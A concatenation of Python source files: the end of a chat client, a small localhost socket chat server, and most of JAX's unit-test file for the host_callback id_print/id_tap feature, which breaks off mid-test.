self.handleInterfaceCommand(SHOW_ALL_CHANNELS, userInput, response)
self.clientView.handlerResponse(response)
elif(userInput[0] == SHOW_MY_CHANNELS):
response = self.handlerServerRequest(SHOW_MY_CHANNELS, userInput)
self.handleInterfaceCommand(SHOW_ALL_CHANNELS, userInput, response)
self.clientView.handlerResponse(response)
elif(userInput[0] == SHOW_ALL_CHANNELS):
response = self.handlerServerRequest(SHOW_ALL_CHANNELS, userInput)
self.handleInterfaceCommand(SHOW_ALL_CHANNELS, userInput, response)
self.clientView.handlerResponse(response)
elif(userInput[0] == CREATE_CHANNEL):
response = self.handlerServerRequest(CREATE_CHANNEL, userInput)
self.clientView.handlerResponse(response)
userInput = self.clientView.redirectScreen()
self.stop()
if __name__ == '__main__':
# Estas duas linhas devem ser mantidas para que o cliente execute.
client = Client(serverHost='localhost', serverPort = 5000)
client.run()
|
calypso_server.py | import socket
import threading
import logging
logger = logging.getLogger(__name__)
TARGET_SOCK_ADDR = ('127.0.0.1', 8080)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.bind(TARGET_SOCK_ADDR)
clients = []
def send_data():
threading.Timer(20.0, send_data).start()
for c in clients:
data = "Message from server"
c.sendall(data.encode())
def receive(c):
while True:
try:
data_from_client = c.recv(1024)
if not data_from_client:
raise OSError('Socket error!')
logger.warning('<CLIENT> %s', data_from_client.decode())
except (socket.error, IOError, OSError):
logger.warning('[DISCONNECT] Connection closed\n')
clients.remove(c)
c.close()
break
client.listen()
while True:
conn, addr = client.accept()
logger.warning('[NEW CONNECTION] Connected with %s', str(addr))
clients.append(conn)
receive_thread = threading.Thread(target=receive, args=(conn, ))
receive_thread.start()
send_data()
|
host_callback_test.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
from unittest import SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax._src import api
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax.lib import xla_bridge
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self.test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self.test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r'.*device: (\S+)', s)
if m:
by_device.append((m.group(1), []))
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun`
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
def devices():
# Tests require using not more than 2 devices.
return api.local_devices()[:2]
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(3)
if "function _print_consumer" in matched:
return match_group.group(1) + "=_print"
else:
return match_group.group(1) + "=..."
what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning(f"Deleting old XLA dump directory {dump_dir}")
shutil.rmtree(dump_dir)
logging.warning(f"Setting XLA dump directory {dump_dir}")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
backend = api.lib.xla_bridge.get_backend()
c = api.xla_computation(fun)(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 devices if available, otherwise 1 device.
We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
device_under_test is not a CPU, then we change the names
"""
expected = expected_2CPUs
if len(devices()) == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackIdTapTest(jtu.JaxTestCase):
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream.test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
super().setUp()
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTest.tearDown")
def test_tap_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
testing_stream.reset()
def test_tap_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
testing_stream.reset()
def test_tap_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00
b=9.00 }""", testing_stream.output)
testing_stream.reset()
def test_tap_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
testing_stream.reset()
def test_tap_with_result_no_arg(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
x1 = hcb.id_tap(tap_func, None, result=x)
return x1
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
testing_stream.reset()
def test_tap_result_unused(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
hcb.id_tap(tap_func, None)
return x
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
testing_stream.reset()
def test_tap_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00
9.00 )""")
testing_stream.reset()
def test_tap_eval_exception(self):
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
testing_stream.reset()
def test_tap_empty(self):
"""Tap empty arrays."""
hcb.id_print((), output_stream=testing_stream)
hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( )
what: second
( 1.00
[] )""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_simple(self):
jit_fun1 = api.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, api.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
api.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
api.xla_computation(func)(1).as_hlo_text())
self.assertEqual(2, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
testing_stream.reset()
def test_tap_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = api.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_devices(self):
"""Running on multiple devices."""
logging.info(f"{self._testMethodName}: has devices {devices()}")
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in devices():
self.assertEqual(112, api.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info(f"{self._testMethodName}: found output {testing_stream.output}")
self.assertEqual(len(devices()), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(len(devices()), len(re.findall(r"112", testing_stream.output)))
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = api.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_tap_multiple(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
# TODO(necula): if there is device side concurrency, outfeeds from
# different computations can be interleaved. For example, it seems that
# on GPU if multiple host threads run a jit computation, the multiple
# computations are interleaved on the GPU. This can result in the outfeed
# trains being interleaved, which will trigger an error.
# The solution is to fix on GPU the receiving logic so that we can outfeed
# the train as one tuple, and receive it one piece as a time. Then the
# trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on CPU or GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info(f"Starting do_tap {idx}. Sleeping 1sec ...")
time.sleep(0.3)
logging.info(f"Finish do_tap {idx}")
def do_tap(idx):
api.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap.
@jtu.skip_on_devices("cpu", "gpu")
def test_tap_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
api.jit(long_run)(5.)
def try_barrier(idx):
logging.info(f"Starting test barrier {idx}")
hcb.barrier_wait()
logging.info(f"Finished test barrier {idx}")
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
testing_stream.reset()
def test_tap_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = api.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{dtype}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_tap_jit_types(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"id_print jit not implemented for {dtype}.")
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = api.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res)
def test_tap_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
api.jit(hcb.id_print)(arg)
def test_tap_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
api.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_tap_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += api.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_tap_jit_tap_exception(self):
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = api.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
testing_stream.reset()
def test_tap_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
testing_stream.reset()
def test_tap_jvp(self):
jvp_fun1 = lambda x, xt: api.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00
0.20 )
transforms: ['jvp'] what: y * 3
( 30.00
0.60 )""", testing_stream.output)
testing_stream.reset()
def test_tap_grad_primal_unused(self):
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
arg = jnp.float32(5.)
jaxpr = str(api.make_jaxpr(grad_func)(arg))
# making the Jaxpr does not print anything
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ lambda ; a.
let b = mul a 3.00
c = outside_call[ arg_treedef=*
callback=...
identity=True
transforms=( ) ] b
_ = mul c 2.00
d = mul 1.00 2.00
e = outside_call[ arg_treedef=*
callback=...
identity=True
transforms=(('jvp',), ('transpose',)) ] d
f = mul e 3.00
in (f,) }""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(arg)
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
testing_stream.reset()
def test_tap_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
testing_stream.reset()
def test_tap_grad_grad(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = api.grad(api.grad(func))
# making the Jaxpr does not print anything
_ = api.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00""", testing_stream.output)
testing_stream.reset()
def test_tap_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = api.grad(func)
print(api.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00
15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00
0.00 )""", testing_stream.output)
testing_stream.reset()
def test_tap_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = api.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
def test_tap_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00
2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00
False )""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap(self):
vmap_fun1 = api.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = api.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00
[4.00 5.00] )""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j using 2 vmap
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return api.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return api.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(api.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: x < 2,
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(np.array([2, 2, 2, 3, 4]), api.jit(api.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
testing_stream.reset()
def test_tap_vmap_while_tap_cond(self):
